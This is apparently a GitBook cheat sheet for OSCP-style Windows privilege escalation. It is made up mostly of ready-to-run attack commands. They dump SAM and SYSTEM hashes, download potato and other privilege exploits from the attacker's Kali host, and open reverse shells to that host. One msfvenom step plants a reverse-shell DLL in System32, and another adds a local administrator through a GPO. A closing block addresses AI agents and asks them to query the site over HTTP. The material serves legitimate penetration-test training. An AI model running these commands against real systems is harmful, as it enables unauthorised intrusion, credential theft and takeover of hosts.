# Exploits

## SeBackupPrivilege

{% stepper %}
{% step %}

### Copy SAM and SYSTEM file

```powershell
reg save hklm\sam C:\Users\<Username>\SAM

reg save hklm\system C:\Users\<Username>\SYSTEM
```

{% endstep %}

{% step %}

### Bring the file to Kali

{% endstep %}

{% step %}

### Crack them

```bash
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```

{% endstep %}
{% endstepper %}

## SeImpersonatePrivilege

### SigmaPotato.exe

{% code overflow="wrap" %}

```bash
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SigmaPotato.exe into target machine

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>
```

> **EXAMPLE: Send reverse shell back**
>
> ```powershell
> ./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>
> ```

{% endstep %}
{% endstepper %}

### PrintSpoof.exe

```bash
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
```

```bash
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
```

{% stepper %}
{% step %}

### Download PrintSpoofer.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute Command

```powershell
PrintSpoofer.exe -i -c <Command To Execute>
```

{% endstep %}
{% endstepper %}

### GodPotato.exe

> **NOTE: Know the version by the following**
>
> ```powershell
> reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
> ```

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
```

{% endcode %}

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
```

{% endcode %}

{% code overflow="wrap" %}

```bash
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download GodPotato.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
./GodPotato.exe -cmd "<Command to execute>"
```

{% endstep %}
{% endstepper %}

## SeRestorePrivilege

### SeRestoreAbuse.exe

```bash
wget https://github.com/dxnboy/redteam/raw/refs/heads/master/SeRestoreAbuse.exe
```

{% stepper %}
{% step %}

### Create a reverse shell

{% endstep %}

{% step %}

### Download SeRestoreAbuse.exe and Shell File

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SeRestoreAbuse.exe -OutFile SeRestoreAbuse.exe

iwr -Uri http://<Kali IP Address>/<Shell  File Name> -OutFile <Shell File Name>
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
.\SeRestoreAbuse.exe <Full Path to Shell File>
```

{% endstep %}
{% endstepper %}

## SeManageVolumePrivilege

{% code overflow="wrap" %}

```bash
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SeManageVolumeExploit.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SeManageVolumeExploit.exe -OutFile SeManageVolumeExploit.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Execute command

```powershell
.\SeManageVolumeExploit.exe
```

{% endstep %}

{% step %}

### Create Revershell

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f dll -o C:\Windows\System32\webm\tzres.dll
```

{% endcode %}
{% endstep %}

{% step %}

### Trigger the DLL

```powershell
systeminfo
```

{% endstep %}
{% endstepper %}

## GPO Abuse

{% code overflow="wrap" %}

```bash
wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
```

{% endcode %}

{% stepper %}
{% step %}

### Download SharpGPOAbuse.exe

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
```

{% endcode %}
{% endstep %}

{% step %}

### Run command

{% code overflow="wrap" %}

```powershell
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"
```

{% endcode %}
{% endstep %}

{% step %}

### Force Group Policy to update

```powershell
gpupdate /force
```

{% endstep %}
{% endstepper %}

## SearchSploit

{% stepper %}
{% step %}

### Windows Enumeration

Identify OS name, version, architecture

```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

```powershell
wmic os get Caption, Version. OSArchitecture
```

> **NOTE: Get Windows Build Version from** [**here**](https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions)**.**
> {% endstep %}

{% step %}

### Search exploit in SearchSploit

```bash
searchspoilt <Key Word>
```

> **EXAMPLE:**
>
> {% code overflow="wrap" %}
>
> ```bash
> searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"
> ```
>
> {% endcode %}
> {% endstep %}

{% step %}

### Download exploit

```bash
searchsploit -m <EDB-ID>
```

{% endstep %}
{% endstepper %}

## Run as another user

### GUI

```powershell
runas /user:<Domain Name>\<Username> cmd.exe
```

### CLI

{% code overflow="wrap" %}

```bash
wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1
```

{% endcode %}

{% stepper %}
{% step %}

### Download Invoke-RunasCs.ps1

{% code overflow="wrap" %}

```powershell
iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -Outfile Invoke-RunasCs.ps1
```

{% endcode %}
{% endstep %}

{% step %}

### Run command

```powershell
Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"
```

{% endstep %}
{% endstepper %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yongjun04.gitbook.io/oscp-cheatsheet/privilege-escalation/windows/exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.